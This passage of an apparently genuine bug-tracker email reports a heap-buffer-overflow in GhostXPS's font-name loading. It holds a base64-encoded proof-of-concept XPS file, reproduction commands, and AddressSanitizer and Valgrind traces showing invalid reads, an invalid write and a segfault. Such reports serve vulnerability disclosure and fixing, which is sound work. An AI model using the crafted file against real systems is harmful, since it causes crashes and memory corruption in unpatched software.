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
ZG9jUEsBAhQACgAAAAAAb3czNQAAAAAAAAAAAAAAABIAAAAAAAAAAAAQAAAA+QAAAERvY3VtZW50
cy8xL1BhZ2VzL1BLAQIUABQAAAAIAG93MzVKqWVPLgIAAKQFAAAZAAAAAAAAAAEAIAAAACkBAABE
b2N1bWVudHMvMS9QYWdlcy8xLmZwYWdlUEsBAhQACgAAAAAAZ3czNQAAAAAAAAAAAAAAABgAAAAA
AAAAAAAQAAAAjgMAAERvY3VtZW50cy8xL1BhZ2VzL19yZWxzL1BLAQIUABQAAAAIAA1aLDVnZKfY
5QAAAD0BAAAkAAAAAAAAAAEAIAAAAMQDAABEb2N1bWVudHMvMS9QYWdlcy9fcmVscy8xLmZwYWdl
LnJlbHNQSwECFAAUAAAACAC8Pu00EJq9FXYAAACgAAAAGwAAAAAAAAABACAAAADrBAAARml4ZWRE
b2N1bWVudFNlcXVlbmNlLmZkc2VxUEsBAhQACgAAAAAAZ3czNQAAAAAAAAAAAAAAAAoAAAAAAAAA
AAAQAAAAmgUAAFJlc291cmNlcy9QSwECFAAUAAAACAANWiw1GacENsJjAACkaAEANAAAAAAAAAAA
ACAAAADCBQAAUmVzb3VyY2VzLzg3MGQyMjRhLTY0MzItNDA2Zi05YmJiLWNmNTQ1MjBjYTEzMi5P
RFRURlBLAQIUABQAAAAIAA1aLDWSb7AeBQEAAKYCAAATAAAAAAAAAAEAIAAAANZpAABbQ29udGVu
dF9UeXBlc10ueG1sUEsBAhQACgAAAAAAZ3czNQAAAAAAAAAAAAAAAAYAAAAAAAAAAAAQAAAADGsA
AF9yZWxzL1BLAQIUABQAAAAIALw+7TSJ5HhyzQAAAB4BAAALAAAAAAAAAAEAIAAAADBrAABfcmVs
cy8ucmVsc1BLBQYAAAAADQANAG4DAAAmbAAAAAA=
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.xps
valgrind ./gxps sDEVICE=pgmraw -r150 -dTextAlphaBits=4 -o /tmp/output.out
-dBATCH -dNOPAUSE PoC.xps
ASAN Report (ghostpdl needs to compiled with -fsanitize=address for this):
./xps/xpsresource.c:181: xps_parse_resource_dictionary(): empty resource
dictionary
./xps/xpszip.c:185: xps_read_zip_entry(): truncated zipfile entry; possibly
corrupt data
=================================================================
==24902==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x632000023172 at pc 0x65c81a103792 bp 0x7428860d5ec0 sp 0x7428860d5680
READ of size 44554 at 0x632000023172 thread T0
#0 0x65c81a103791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
#1 0x27a7e91 in xps_load_sfnt_name xps/xpsfont.c:214
#2 0x27b2066 in xps_init_truetype_font xps/xpsttf.c:381
#3 0x27a6b2e in xps_new_font xps/xpsfont.c:83
#4 0x27a40e1 in xps_parse_glyphs xps/xpsglyphs.c:720
#5 0x276f044 in xps_parse_canvas xps/xpspage.c:99
#6 0x2770256 in xps_parse_fixed_page xps/xpspage.c:274
#7 0x27637d7 in xps_read_and_process_page_part xps/xpszip.c:536
#8 0x27637d7 in xps_process_file xps/xpszip.c:685
#9 0x4b5662 in xps_imp_process_file xps/xpstop.c:307
#10 0x2a262ca in pl_main_aux pcl/pl/plmain.c:470
#11 0x65c818c63b44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#12 0x4b433c (/home/ghostxps/ghostpdl-9.20/debugbin/gxps+0x4b433c)
AddressSanitizer can not describe address in more detail (wild memory access
suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x0c647fffc5d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc5e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc5f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c647fffc620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa
0x0c647fffc630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==24902==ABORTING
Valgrind report:
==20801== Memcheck, a memory error detector
==20801== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==20801== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==20801== Command: /home/ghostxps/ghostpdl-git/ghostpdl/debugbin/gxps
-sDEVICE=pgmraw -r150 -dTextAlphaBits=4 -o /tmp/crapp131p2.pdf -dBATCH
-dNOPAUSE /tmp/PoC.xps
==20801==
./xps/xpsresource.c:181: xps_parse_resource_dictionary(): empty resource
dictionary
./xps/xpszip.c:185: xps_read_zip_entry(): truncated zipfile entry; possibly
corrupt data
==20801== Invalid read of size 2
==20801== at 0x4C2D988: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==20801== by 0xA27E66: xps_load_sfnt_name (xpsfont.c:214)
==20801== by 0xA29C1C: xps_init_truetype_font (xpsttf.c:384)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0x71f4ab2 is 49,122 bytes inside a block of size 65,664
free'd
==20801== at 0x4C29E90: free (vg_replace_malloc.c:473)
==20801== by 0x8AE1DC: gs_heap_free_object (gsmalloc.c:354)
==20801== by 0x694C98: chunk_mem_node_remove (gsmchunk.c:403)
==20801== by 0x695509: chunk_free_object (gsmchunk.c:654)
==20801== by 0xA13AE6: xps_read_zip_entry (xpszip.c:180)
==20801== by 0xA144C5: xps_read_zip_part (xpszip.c:341)
==20801== by 0xA14B98: xps_read_part (xpszip.c:500)
==20801== by 0xA26D81: xps_parse_glyphs (xpsglyphs.c:701)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801==
==20801== Invalid read of size 2
==20801== at 0x4C2D996: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==20801== by 0xA27E66: xps_load_sfnt_name (xpsfont.c:214)
==20801== by 0xA29C1C: xps_init_truetype_font (xpsttf.c:384)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0x71f4ab6 is 49,126 bytes inside a block of size 65,664
free'd
==20801== at 0x4C29E90: free (vg_replace_malloc.c:473)
==20801== by 0x8AE1DC: gs_heap_free_object (gsmalloc.c:354)
==20801== by 0x694C98: chunk_mem_node_remove (gsmchunk.c:403)
==20801== by 0x695509: chunk_free_object (gsmchunk.c:654)
==20801== by 0xA13AE6: xps_read_zip_entry (xpszip.c:180)
==20801== by 0xA144C5: xps_read_zip_part (xpszip.c:341)
==20801== by 0xA14B98: xps_read_part (xpszip.c:500)
==20801== by 0xA26D81: xps_parse_glyphs (xpsglyphs.c:701)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801==
==20801== Invalid write of size 2
==20801== at 0x4C2D98B: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==20801== by 0xA27E66: xps_load_sfnt_name (xpsfont.c:214)
==20801== by 0xA29C1C: xps_init_truetype_font (xpsttf.c:384)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0x6d25a70 is 0 bytes after a block of size 65,664 alloc'd
==20801== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==20801== by 0x8ADAC2: gs_heap_alloc_bytes (gsmalloc.c:189)
==20801== by 0x6949F9: chunk_mem_node_add (gsmchunk.c:341)
==20801== by 0x694E16: chunk_obj_alloc (gsmchunk.c:450)
==20801== by 0x695166: chunk_alloc_bytes_immovable (gsmchunk.c:545)
==20801== by 0x8C8DB5: gs_fapi_init (gxfapi.c:1942)
==20801== by 0x8A6487: gs_lib_init1 (gsinit.c:61)
==20801== by 0xAA1D75: pl_main_aux (plmain.c:270)
==20801== by 0xAA2B2F: pl_main (plmain.c:597)
==20801== by 0xAA1BB6: main (realmain.c:21)
==20801==
==20801== Invalid read of size 1
==20801== at 0x4C2C1B4: strlen (vg_replace_strmem.c:412)
==20801== by 0xA29C2E: xps_init_truetype_font (xpsttf.c:385)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== by 0xA019EF: pl_process_file (pltop.c:138)
==20801== Address 0x6d25a70 is 0 bytes after a block of size 65,664 alloc'd
==20801== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==20801== by 0x8ADAC2: gs_heap_alloc_bytes (gsmalloc.c:189)
==20801== by 0x6949F9: chunk_mem_node_add (gsmchunk.c:341)
==20801== by 0x694E16: chunk_obj_alloc (gsmchunk.c:450)
==20801== by 0x695166: chunk_alloc_bytes_immovable (gsmchunk.c:545)
==20801== by 0x8C8DB5: gs_fapi_init (gxfapi.c:1942)
==20801== by 0x8A6487: gs_lib_init1 (gsinit.c:61)
==20801== by 0xAA1D75: pl_main_aux (plmain.c:270)
==20801== by 0xAA2B2F: pl_main (plmain.c:597)
==20801== by 0xAA1BB6: main (realmain.c:21)
==20801==
==20801== Invalid read of size 8
==20801== at 0x8C881A: gs_fapi_passfont (gxfapi.c:1782)
==20801== by 0xA2C44C: xps_fapi_passfont (xpsfapi.c:203)
==20801== by 0xA29DCC: xps_init_truetype_font (xpsttf.c:419)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0xf1f1f1f1f1f1f1f9 is not stack'd, malloc'd or (recently)
free'd
==20801==
==20801==
==20801== Process terminating with default action of signal 11 (SIGSEGV)
==20801== General Protection Fault
==20801== at 0x8C881A: gs_fapi_passfont (gxfapi.c:1782)
==20801== by 0xA2C44C: xps_fapi_passfont (xpsfapi.c:203)
==20801== by 0xA29DCC: xps_init_truetype_font (xpsttf.c:419)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801==
==20801== HEAP SUMMARY:
==20801== in use at exit: 1,500,020 bytes in 83 blocks
==20801== total heap usage: 690 allocs, 607 frees, 5,173,051 bytes allocated
==20801==
==20801== LEAK SUMMARY:
==20801== definitely lost: 0 bytes in 0 blocks
==20801== indirectly lost: 0 bytes in 0 blocks
==20801== possibly lost: 66,968 bytes in 10 blocks
==20801== still reachable: 1,433,052 bytes in 73 blocks
==20801== suppressed: 0 bytes in 0 blocks
==20801== Rerun with --leak-check=full to see details of leaked memory
==20801==
==20801== For counts of detected and suppressed errors, rerun with: -v
==20801== ERROR SUMMARY: 22406 errors from 5 contexts (suppressed: 0 from 0)
--
You are receiving this mail because:
You are the QA Contact for the bug.
You are receiving this mail because:
You are the QA Contact for the bug.